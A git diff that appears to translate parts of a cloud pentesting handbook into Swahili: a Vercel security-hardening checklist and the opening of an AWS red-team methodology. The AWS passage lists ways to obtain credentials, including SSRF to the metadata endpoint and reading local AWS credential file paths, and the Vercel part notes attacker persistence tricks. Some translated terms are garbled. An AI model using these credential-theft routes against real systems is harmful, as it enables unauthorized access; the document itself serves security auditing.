+- **Risk:** Ugunduzi wa kuchelewa wa uunganisho ulioathirika, kuongezeka kwa athari za uvunjaji wa usalama.
---
### Deployment Protection
-**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments.
+**Purpose:** Kulinda kutekeleza kupitia mitambo mbalimbali ya ulinzi, kudhibiti nani anaweza kufikia na kutekeleza kwenye mazingira yako.
#### Security Configurations:
**Vercel Authentication**
-- **Misconfiguration:** Disabling authentication or not enforcing team member checks.
-- **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse.
+- **Misconfiguration:** Kuondoa uthibitisho au kutotekeleza ukaguzi wa wanachama wa timu.
+- **Risk:** Watumiaji wasioidhinishwa wanaweza kufikia kutekeleza, kupelekea uvunjaji wa data au matumizi mabaya ya application.
**Protection Bypass for Automation**
-- **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets.
-- **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments.
+- **Misconfiguration:** Kuonyesha siri ya bypass hadharani au kutumia siri dhaifu.
+- **Risk:** Wavamizi wanaweza kupita ulinzi wa kutekeleza, wakipata na kubadilisha kutekeleza kulindwa.
**Shareable Links**
-- **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links.
-- **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions.
+- **Misconfiguration:** Kushiriki viungo bila kuchuja au kukosa kufuta viungo vya zamani.
+- **Risk:** Ufikiaji usioidhinishwa wa kutekeleza kulindwa, kupita uthibitisho na vizuizi vya IP.
**OPTIONS Allowlist**
-- **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints.
-- **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks.
+- **Misconfiguration:** Kuruhusu njia pana sana au mwisho wa nyeti.
+- **Risk:** Wavamizi wanaweza kutumia njia zisizo salama kufanya vitendo visivyoidhinishwa au kupita ukaguzi wa usalama.
**Password Protection**
-- **Misconfiguration:** Using weak passwords or sharing them insecurely.
-- **Risk:** Unauthorized access to deployments if passwords are guessed or leaked.
-- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
+- **Misconfiguration:** Kutumia nywila dhaifu au kuzishiriki kwa njia isiyo salama.
+- **Risk:** Ufikiaji usioidhinishwa wa kutekeleza ikiwa nywila zitakisiwa au kuvuja.
+- **Note:** Inapatikana kwenye mpango wa **Pro** kama sehemu ya **Advanced Deployment Protection** kwa $150/ mwezi zaidi.
**Deployment Protection Exceptions**
-- **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently.
-- **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access.
-- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
+- **Misconfiguration:** Kuongeza maeneo ya uzalishaji au nyeti kwenye orodha ya visingizio bila kukusudia.
+- **Risk:** Kuonyesha kutekeleza muhimu kwa umma, kupelekea kuvuja kwa data au ufikiaji usioidhinishwa.
+- **Note:** Inapatikana kwenye mpango wa **Pro** kama sehemu ya **Advanced Deployment Protection** kwa $150/ mwezi zaidi.
**Trusted IPs**
-- **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges.
-- **Risk:** Legitimate users being blocked or unauthorized IPs gaining access.
-- **Note:** Available on the **Enterprise** plan.
+- **Misconfiguration:** Kuweka vibaya anwani za IP au anuwai za CIDR.
+- **Risk:** Watumiaji halali kuzuia au IP zisizoidhinishwa kupata ufikiaji.
+- **Note:** Inapatikana kwenye mpango wa **Enterprise**.
---
### Functions
-**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies.
+**Purpose:** Kuunda mipangilio ya kazi zisizo na seva, ikiwa ni pamoja na mipangilio ya wakati, ugawaji wa kumbukumbu, na sera za usalama.
#### Security Configurations:
@@ -167,81 +167,81 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
### Data Cache
-**Purpose:** Manage caching strategies and settings to optimize performance and control data storage.
+**Purpose:** Kusimamia mikakati na mipangilio ya caching ili kuboresha utendaji na kudhibiti uhifadhi wa data.
#### Security Configurations:
- **Purge Cache**
- - **Misconfiguration:** It allows to delete all the cache.
- - **Risk:** Unauthorized users deleting the cache leading to a potential DoS.
+- **Misconfiguration:** Inaruhusu kufuta cache yote.
+- **Risk:** Watumiaji wasioidhinishwa wakifuta cache kupelekea uwezekano wa DoS.
---
### Cron Jobs
-**Purpose:** Schedule automated tasks and scripts to run at specified intervals.
+**Purpose:** Kuunda kazi za kiotomatiki na scripts kuendesha kwa vipindi vilivyotajwa.
#### Security Configurations:
- **Disable Cron Job**
- - **Misconfiguration:** It allows to disable cron jobs declared inside the code
- - **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for)
+- **Misconfiguration:** Inaruhusu kuzima kazi za cron zilizotangazwa ndani ya msimbo
+- **Risk:** Ukatishaji wa huduma (kutegemea ni nini kazi za cron zilikuwa zikitumika)
---
### Log Drains
-**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing.
+**Purpose:** Kuunda huduma za nje za kuandika ili kukamata na kuhifadhi kumbukumbu za application kwa ajili ya kufuatilia na kukagua.
#### Security Configurations:
-- Nothing (managed from teams settings)
+- Nothing (inayosimamiwa kutoka mipangilio ya timu)
---
### Security
-**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more.
+**Purpose:** Kituo cha kati kwa mipangilio mbalimbali zinazohusiana na usalama zinazoathiri ufikiaji wa mradi, ulinzi wa chanzo, na zaidi.
#### Security Configurations:
**Build Logs and Source Protection**
-- **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly.
-- **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities.
+- **Misconfiguration:** Kuondoa ulinzi au kuonyesha njia za `/logs` na `/src` hadharani.
+- **Risk:** Ufikiaji usioidhinishwa wa kumbukumbu za kujenga na msimbo wa chanzo, kupelekea kuvuja kwa taarifa na uwezekano wa kutumia udhaifu.
**Git Fork Protection**
-- **Misconfiguration:** Allowing unauthorized pull requests without proper reviews.
-- **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors.
+- **Misconfiguration:** Kuruhusu ombi zisizoidhinishwa bila ukaguzi sahihi.
+- **Risk:** Msimbo mbaya unaweza kuunganishwa kwenye msingi wa msimbo, kuanzisha udhaifu au milango ya nyuma.
**Secure Backend Access with OIDC Federation**
-- **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs.
-- **Risk:** Unauthorized access to backend services through flawed authentication flows.
+- **Misconfiguration:** Kuweka vibaya vigezo vya OIDC au kutumia URL zisizo salama za mtoaji.
+- **Risk:** Ufikiaji usioidhinishwa wa huduma za nyuma kupitia mchakato wa uthibitisho ulio na kasoro.
**Deployment Retention Policy**
-- **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention).
-- **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments.
+- **Misconfiguration:** Kuweka vipindi vya uhifadhi kuwa vifupi sana (kupoteza historia ya kutekeleza) au virefu sana (uhifadhi wa data usio wa lazima).
+- **Risk:** Kutokuweza kufanya kurudi nyuma inapohitajika au kuongezeka kwa hatari ya kufichuliwa kwa data kutoka kwa kutekeleza zamani.
**Recently Deleted Deployments**
-- **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions.
-- **Risk:** Loss of critical deployment history, hindering audits and rollbacks.
+- **Misconfiguration:** Kukosa kufuatilia kutekeleza zilizofutwa au kutegemea tu kufutwa kwa kiotomatiki.
+- **Risk:** Kupoteza historia muhimu ya kutekeleza, kuzuia ukaguzi na kurudi nyuma.
---
### Advanced
-**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security.
+**Purpose:** Ufikiaji wa mipangilio ya ziada ya mradi kwa ajili ya kuboresha mipangilio na kuimarisha usalama.
#### Security Configurations:
**Directory Listing**
-- **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file.
-- **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks.
+- **Misconfiguration:** Kuwezesha orodha ya orodha kunaruhusu watumiaji kuona maudhui ya orodha bila faili ya index.
+- **Risk:** Kuonyeshwa kwa faili nyeti, muundo wa application, na maeneo yanayoweza kuwa na hatari kwa mashambulizi.
---
@@ -253,13 +253,13 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
**Enable Attack Challenge Mode**
-- **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability
-- **Risk:** Potential user experience problems.
+- **Misconfiguration:** Kuwezesha hii kunaboresha ulinzi wa application ya wavuti dhidi ya DoS lakini kwa gharama ya matumizi
+- **Risk:** Matatizo ya uwezekano wa uzoefu wa mtumiaji.
### Custom Rules & IP Blocking
-- **Misconfiguration:** Allows to unblock/block traffic
-- **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic
+- **Misconfiguration:** Inaruhusu kuzuia/kufungua trafiki
+- **Risk:** Uwezekano wa DoS ukiruhusu trafiki ya uhalifu au kuzuia trafiki ya halali
---
@@ -267,13 +267,13 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
### Source
-- **Misconfiguration:** Allows access to read the complete source code of the application
-- **Risk:** Potential exposure of sensitive information
+- **Misconfiguration:** Inaruhusu ufikiaji wa kusoma msimbo kamili wa application
+- **Risk:** Uwezekano wa kufichuliwa kwa taarifa nyeti
### Skew Protection
-- **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other.
-- **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future
+- **Misconfiguration:** Ulinzi huu unahakikisha mteja na application ya seva kila wakati wanatumia toleo sawa ili kusiwe na kutokuelewana ambapo mteja anatumia toleo tofauti na seva na hivyo hawaelewani.
+- **Risk:** Kuondoa hii (ikiwa imewezeshwa) kunaweza kusababisha matatizo ya DoS katika kutekeleza mpya siku zijazo
---
@@ -284,11 +284,11 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
#### Security Configurations:
- **Transfer**
- - **Misconfiguration:** Allows to transfer all the projects to another team
- - **Risk:** An attacker could steal the projects
+- **Misconfiguration:** Inaruhusu kuhamasisha miradi yote kwa timu nyingine
+- **Risk:** Mshambuliaji anaweza kuiba miradi
- **Delete Project**
- - **Misconfiguration:** Allows to delete the team with all the projects
- - **Risk:** Delete the projects
+- **Misconfiguration:** Inaruhusu kufuta timu na miradi yote
+- **Risk:** Futa miradi
---
@@ -297,8 +297,8 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
#### Security Configurations:
- **Speed Insights Cost Limit**
- - **Misconfiguration:** An attacker could increase this number
- - **Risk:** Increased costs
+- **Misconfiguration:** Mshambuliaji anaweza kuongeza nambari hii
+- **Risk:** Kuongezeka kwa gharama
---
@@ -307,25 +307,25 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
#### Security Configurations:
- **Add members**
- - **Misconfiguration:** An attacker could maintain persitence inviting an account he control
- - **Risk:** Attacker persistence
+- **Misconfiguration:** Mshambuliaji anaweza kudumisha kudumu kwa kumwalika akaunti anayoitawala
+- **Risk:** Kudumu kwa mshambuliaji
- **Roles**
- - **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration. Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)
- - **Risk**: Increate the exposure of the Vercel Team
+- **Misconfiguration:** Kutoa ruhusa nyingi kwa watu wasiohitaji huongeza hatari ya usanidi wa vercel. Angalia majukumu yote yanayowezekana katika [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)
+- **Risk**: Kuongeza kufichuliwa kwa Vercel Team
---
### Access Groups
-An **Access Group** in Vercel is a collection of projects and team members with predefined role assignments, enabling centralized and streamlined access management across multiple projects.
+**Access Group** katika Vercel ni mkusanyiko wa miradi na wanachama wa timu wenye ugawaji wa majukumu yaliyowekwa, kuruhusu usimamizi wa ufikiaji wa kati na wa haraka kati ya miradi mingi.
**Potential Misconfigurations:**
-- **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions.
-- **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation.
-- **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended.
-- **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions.
-- **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps.
+- **Over-Permissioning Members:** Kuweka majukumu yenye ruhusa zaidi ya zinazohitajika, kupelekea ufikiaji au vitendo visivyoidhinishwa.
+- **Improper Role Assignments:** Kuweka vibaya majukumu ambavyo havikidhi majukumu ya wanachama wa timu, kupelekea kupanda kwa ruhusa.
+- **Lack of Project Segregation:** Kukosa kutenganisha miradi nyeti, kuruhusu ufikiaji mpana zaidi kuliko ilivyokusudiwa.
+- **Insufficient Group Management:** Kukosa kukagua au kuboresha Vikundi vya Ufikiaji mara kwa mara, kupelekea ruhusa za ufikiaji zisizofaa au za zamani.
+- **Inconsistent Role Definitions:** Kutumia ufafanuzi wa majukumu usio sawa au usio wazi kati ya Vikundi vya Ufikiaji tofauti, kupelekea mkanganyiko na mapengo ya usalama.
---
@@ -334,8 +334,8 @@ An **Access Group** in Vercel is a collection of projects and team members with
#### Security Configurations:
- **Log Drains to third parties:**
- - **Misconfiguration:** An attacker could configure a Log Drain to steal the logs
- - **Risk:** Partial persistence
+- **Misconfiguration:** Mshambuliaji anaweza kuunda Log Drain kuiba kumbukumbu
+- **Risk:** Kudumu kwa sehemu
---
@@ -343,99 +343,95 @@ An **Access Group** in Vercel is a collection of projects and team members with
#### Security Configurations:
-- **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard.
- - **Misconfiguration:**
- - Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting.
- - Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain.
- - **Risks:**
- - **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team.
- - **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals.
-- **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access.
- - **Misconfiguration:** Not adding critical Git scopes to the protected list.
+- **Team Email Domain:** Wakati umewekwa, mipangilio hii inawakaribisha moja kwa moja Akaunti za Kibinafsi za Vercel zenye anwani za barua pepe zinazomalizika na domain iliyotajwa (kwa mfano, `mydomain.com`) kujiunga na timu yako wakati wa kujiandikisha na kwenye dashibodi.
+- **Misconfiguration:**
+- Kuweka domain ya barua pepe isiyo sahihi au domain iliyoandikwa vibaya katika mipangilio ya Team Email Domain.
+- Kutumia domain ya barua pepe ya kawaida (kwa mfano, `gmail.com`, `hotmail.com`) badala ya domain maalum ya kampuni.
- **Risks:**
- - **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization.
- - **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team.
-- **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system.
- - **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled.
- - **Risks:**
- - **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members.
- - **Data Breach:** Sensitive information like API keys and credentials could be leaked.
-- **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members.
- - **Misconfiguration:**\
- Granting access to audit logs to unauthorized team members.
- - **Risks:**
- - **Privacy Violations:** Exposure of sensitive user activities and data.
- - **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks.
-- **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management.
- - **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints.
- - **Risk:** Maintain persistence
-- **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains.
- - **Misconfiguration:** Leaving IP address visibility enabled without necessity.
- - **Risks:**
- - **Privacy Violations:** Non-compliance with data protection regulations like GDPR.
- - **Legal Repercussions:** Potential fines and penalties for mishandling personal data.
-- **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing.
- - **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic.
- - **Risks:**
- - **Service Denial to Legitimate Users:** Blocking access for valid users or partners.
- - **Operational Disruptions:** Loss of service availability for certain regions or clients.
+- **Unauthorized Access:** Watumiaji wenye anwani za barua pepe kutoka domain zisizokusudiwa wanaweza kupokea mialiko ya kujiunga na timu yako.
+- **Data Exposure:** Uwezekano wa kufichuliwa kwa taarifa nyeti za mradi kwa watu wasioidhinishwa.
+- **Protected Git Scopes:** Inaruhusu kuongeza hadi 5 Git scopes kwa timu yako ili kuzuia timu nyingine za Vercel kutekeleza repositories kutoka kwenye scope iliyo salama. Timu nyingi zinaweza kuweka scope sawa, kuruhusu timu zote kupata ufikiaji.
+- **Misconfiguration:** Kukosa kuongeza Git scopes muhimu kwenye orodha ya iliyo salama.
+- **Risks:**
+- **Unauthorized Deployments:** Timu nyingine zinaweza kutekeleza repositories kutoka kwenye Git scopes za shirika lako bila ruhusa.
+- **Intellectual Property Exposure:** Msimbo wa miliki unaweza kutekelezwa na kupatikana nje ya timu yako.
+- **Environment Variable Policies:** Inalazimisha sera za kuunda na kuhariri vigezo vya mazingira vya timu. Kwa haswa, unaweza kulazimisha kwamba vigezo vyote vya mazingira vimeundwa kama **Sensitive Environment Variables**, ambavyo vinaweza kufichuliwa tu na mfumo wa kutekeleza wa Vercel.
+- **Misconfiguration:** Kuacha kulazimisha vigezo vya mazingira nyeti kuwa kuzimwa.
+- **Risks:**
+- **Exposure of Secrets:** Vigezo vya mazingira vinaweza kuonyeshwa au kuhaririwa na wanachama wasioidhinishwa wa timu.
+- **Data Breach:** Taarifa nyeti kama funguo za API na akidi zinaweza kuvuja.
+- **Audit Log:** Inatoa usafirishaji wa shughuli za timu kwa hadi siku 90 zilizopita. Kumbukumbu za ukaguzi husaidia katika kufuatilia na kufuatilia vitendo vilivyofanywa na wanachama wa timu.
+- **Misconfiguration:**\
+Kutoa ufikiaji wa kumbukumbu za ukaguzi kwa wanachama wasioidhinishwa wa timu.
+- **Risks:**
+- **Privacy Violations:** Kuonyeshwa kwa shughuli na data nyeti za watumiaji.
+- **Tampering with Logs:** Watu wabaya wanaweza kubadilisha au kufuta kumbukumbu ili kuficha nyayo zao.
+- **SAML Single Sign-On:** Inaruhusu kubadilisha uthibitisho wa SAML na usawazishaji wa directory kwa timu yako, kuruhusu uunganisho na Mtoaji wa Kitambulisho (IdP) kwa uthibitisho wa kati na usimamizi wa watumiaji.
+- **Misconfiguration:** Mshambuliaji anaweza kuingiza milango ya nyuma kwenye mipangilio ya Timu akipanga vigezo vya SAML kama Entity ID, SSO URL, au alama za cheti.
+- **Risk:** Kudumisha kudumu
+- **IP Address Visibility:** Kudhibiti ikiwa anwani za IP, ambazo zinaweza kuzingatiwa kama taarifa binafsi chini ya sheria fulani za ulinzi wa data, zinaonyeshwa katika maswali ya Ufuatiliaji na Log Drains.
+- **Misconfiguration:** Kuacha kuonyesha anwani za IP bila sababu.
+- **Risks:**
+- **Privacy Violations:** Kukosa kufuata kanuni za ulinzi wa data kama GDPR.
+- **Legal Repercussions:** Uwezekano wa faini na adhabu kwa kushughulikia data binafsi vibaya.
+- **IP Blocking:** Inaruhusu mipangilio ya anwani za IP na anuwai za CIDR ambazo Vercel inapaswa kuzuia maombi kutoka. Maombi yaliyozuiwa hayachangii bili yako.
+- **Misconfiguration:** Inaweza kutumiwa vibaya na mshambuliaji kuruhusu trafiki ya uhalifu au kuzuia trafiki halali.
+- **Risks:**
+- **Service Denial to Legitimate Users:** Kuzuia ufikiaji kwa watumiaji halali au washirika.
+- **Operational Disruptions:** Kupoteza upatikanaji wa huduma kwa maeneo fulani au wateja.
---
### Secure Compute
-**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy.
+**Vercel Secure Compute** inaruhusu uhusiano salama, wa faragha kati ya Vercel Functions na mazingira ya nyuma (kwa mfano, databases) kwa kuanzisha mitandao iliyotengwa yenye anwani za IP maalum. Hii inondoa haja ya kuonyesha huduma za nyuma hadharani, kuimarisha usalama, kufuata sheria, na faragha.
#### **Potential Misconfigurations and Risks**
1. **Incorrect AWS Region Selection**
- - **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region.
- - **Risk:** Increased latency, potential data residency compliance issues, and degraded performance.
+- **Misconfiguration:** Kuchagua eneo la AWS kwa mtandao wa Secure Compute ambalo halifanani na eneo la huduma za nyuma.
+- **Risk:** Kuongezeka kwa ucheleweshaji, matatizo ya kufuata makazi ya data, na utendaji mbovu.
2. **Overlapping CIDR Blocks**
- - **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks.
- - **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks.
+- **Misconfiguration:** Kuchagua blocks za CIDR zinazovutana na VPC zilizopo au mitandao mingine.
+- **Risk:** Migogoro ya mtandao inayopelekea kuunganishwa kwa kushindwa, ufikiaji usioidhinishwa, au kuvuja kwa data kati ya mitandao.
3. **Improper VPC Peering Configuration**
- - **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates).
- - **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches.
+- **Misconfiguration:** Kuweka vibaya VPC peering (kwa mfano, IDs za VPC zisizo sahihi, masasisho yasiyokamilika ya jedwali la njia).
+- **Risk:** Ufikiaji usioidhinishwa wa miundombinu ya nyuma, kuunganishwa kwa salama kushindwa, na uwezekano wa uvunjaji wa data.
4. **Excessive Project Assignments**
- - **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation.
- - **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others.
+- **Misconfiguration:** Kuweka miradi mingi kwenye mtandao mmoja wa Secure Compute bila kutengwa ipasavyo.
+- **Risk:** Kuongezeka kwa kufichuliwa kwa IP kunaongeza uso wa shambulio, na kuweza kuruhusu miradi iliyoharibiwa kuathiri nyingine.
5. **Inadequate IP Address Management**
- - **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately.
- - **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities.
+- **Misconfiguration:** Kukosa kusimamia au kubadilisha anwani za IP maalum ipasavyo.
+- **Risk:** IP spoofing, udhaifu wa ufuatiliaji, na uwezekano wa kuorodheshwa kama mbaya ikiwa IP zitahusishwa na shughuli za uhalifu.
6. **Including Build Containers Unnecessarily**
- - **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds.
- - **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources.
+- **Misconfiguration:** Kuongeza vyombo vya kujenga kwenye mtandao wa Secure Compute wakati ufikiaji wa nyuma hauhitajiki wakati wa kujenga.
+- **Risk:** Kuongezeka kwa uso wa shambulio, ucheleweshaji wa ugawaji, na matumizi yasiyo ya lazima ya rasilimali za mtandao.
7. **Failure to Securely Handle Bypass Secrets**
- - **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections.
- - **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code.
+- **Misconfiguration:** Kuonyesha au kushughulikia vibaya siri zinazotumika kupita ulinzi wa kutekeleza.
+- **Risk:** Ufikiaji usioidhinishwa wa kutekeleza kulindwa, kuruhusu wavamizi kubadilisha au kutekeleza msimbo mbaya.
8. **Ignoring Region Failover Configurations**
- - **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings.
- - **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency.
+- **Misconfiguration:** Kukosa kuweka maeneo ya failover yasiyo ya msingi au kuweka vibaya mipangilio ya failover.
+- **Risk:** Kukosekana kwa huduma wakati wa kutofaulu kwa eneo la msingi, kupelekea kupungua kwa upatikanaji na uwezekano wa kutokuelewana kwa data.
9. **Exceeding VPC Peering Connection Limits**
- - **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections).
- - **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions.
+- **Misconfiguration:** Kujaribu kuanzisha uhusiano zaidi wa VPC peering kuliko kiwango kinachoruhusiwa (kwa mfano, kupita uhusiano 50).
+- **Risk:** Kukosa kuunganishwa kwa huduma muhimu za nyuma kwa usalama, kupelekea kushindwa kwa kutekeleza na usumbufu wa operesheni.
10. **Insecure Network Settings**
- - **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network.
- - **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks.
+- **Misconfiguration:** Sheria dhaifu za moto, kukosa usimbuaji, au kutenganisha mtandao vibaya ndani ya mtandao wa Secure Compute.
+- **Risk:** Kukamatwa kwa data, ufikiaji usioidhinishwa wa huduma za nyuma, na kuongezeka kwa udhaifu wa mashambulizi.
---
### Environment Variables
-**Purpose:** Manage environment-specific variables and secrets used by all the projects.
+**Purpose:** Kusimamia vigezo maalum vya mazingira na siri zinazotumika na miradi yote.
#### Security Configurations:
- **Exposing Sensitive Variables**
- - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
- - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
+- **Misconfiguration:** Kuongeza alama ya `NEXT_PUBLIC_` kwa vigezo nyeti, na kuifanya ipatikane upande wa mteja.
+- **Risk:** Kuonyeshwa kwa funguo za API, akidi za database, au data nyingine nyeti kwa umma, kupelekea uvunjaji wa data.
- **Sensitive disabled**
- - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
- - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
+- **Misconfiguration:** Ikiwa imezimwa (kawaida) inawezekana kusoma thamani za siri zilizozalishwa.
+- **Risk:** Kuongezeka kwa uwezekano wa kufichuliwa kwa bahati mbaya au ufikiaji usioidhinishwa wa taarifa nyeti.
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/README.md b/src/pentesting-cloud/aws-security/README.md
index ad71de826..837cafd7d 100644
--- a/src/pentesting-cloud/aws-security/README.md
+++ b/src/pentesting-cloud/aws-security/README.md
@@ -4,9 +4,9 @@
## Basic Information
-**Before start pentesting** an **AWS** environment there are a few **basics things you need to know** about how AWS works to help you understand what you need to do, how to find misconfigurations and how to exploit them.
+**Kabla ya kuanza pentesting** mazingira ya **AWS**, kuna mambo machache **muhimu unahitaji kujua** kuhusu jinsi AWS inavyofanya kazi ili kukusaidia kuelewa unachohitaji kufanya, jinsi ya kupata makosa ya usanidi na jinsi ya kuyatumia.
-Concepts such as organization hierarchy, IAM and other basic concepts are explained in:
+Mifano kama vile hiyerarhya ya shirika, IAM na dhana nyingine za msingi zinaelezwa katika:
{{#ref}}
aws-basic-information/
@@ -29,42 +29,42 @@ Tools to simulate attacks:
## AWS Pentester/Red Team Methodology
-In order to audit an AWS environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal AWS services an **external services** connected.
+Ili kukagua mazingira ya AWS, ni muhimu sana kujua: ni **huduma zipi zinatumika**, nini kinacho **onyeshwa**, nani ana **ufikiaji** wa nini, na jinsi huduma za ndani za AWS na **huduma za nje** zinavyounganishwa.
-From a Red Team point of view, the **first step to compromise an AWS environment** is to manage to obtain some **credentials**. Here you have some ideas on how to do that:
+Kutoka kwa mtazamo wa Red Team, **hatua ya kwanza ya kuathiri mazingira ya AWS** ni kufanikiwa kupata **akili**. Hapa kuna mawazo kadhaa juu ya jinsi ya kufanya hivyo:
-- **Leaks** in github (or similar) - OSINT
-- **Social** Engineering
-- **Password** reuse (password leaks)
-- Vulnerabilities in AWS-Hosted Applications
- - [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
- - **Local File Read**
- - `/home/USERNAME/.aws/credentials`
- - `C:\Users\USERNAME\.aws\credentials`
-- 3rd parties **breached**
-- **Internal** Employee
+- **Mvuzi** katika github (au sawa) - OSINT
+- **Uhandisi** wa Kijamii
+- **Tena** ya nywila (mvuzi wa nywila)
+- Uhalifu katika Programu za AWS-Zilizohifadhiwa
+- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) yenye ufikiaji wa metadata endpoint
+- **Usomaji wa Faili za Mitaa**
+- `/home/USERNAME/.aws/credentials`
+- `C:\Users\USERNAME\.aws\credentials`
+- **Watu wa tatu** walio **vunjwa**
+- **Mfanyakazi** wa Ndani
- [**Cognito** ](aws-services/aws-cognito-enum/#cognito)credentials
-Or by **compromising an unauthenticated service** exposed:
+Au kwa **kuathiri huduma isiyo na uthibitisho** iliyonyeshwa:
{{#ref}}
aws-unauthenticated-enum-access/
{{#endref}}
-Or if you are doing a **review** you could just **ask for credentials** with these roles:
